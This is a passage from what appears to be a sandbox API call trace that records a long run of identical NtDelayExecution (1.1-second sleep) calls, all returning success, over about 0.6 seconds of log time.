(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.800] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0138.921] NtDelayExecution 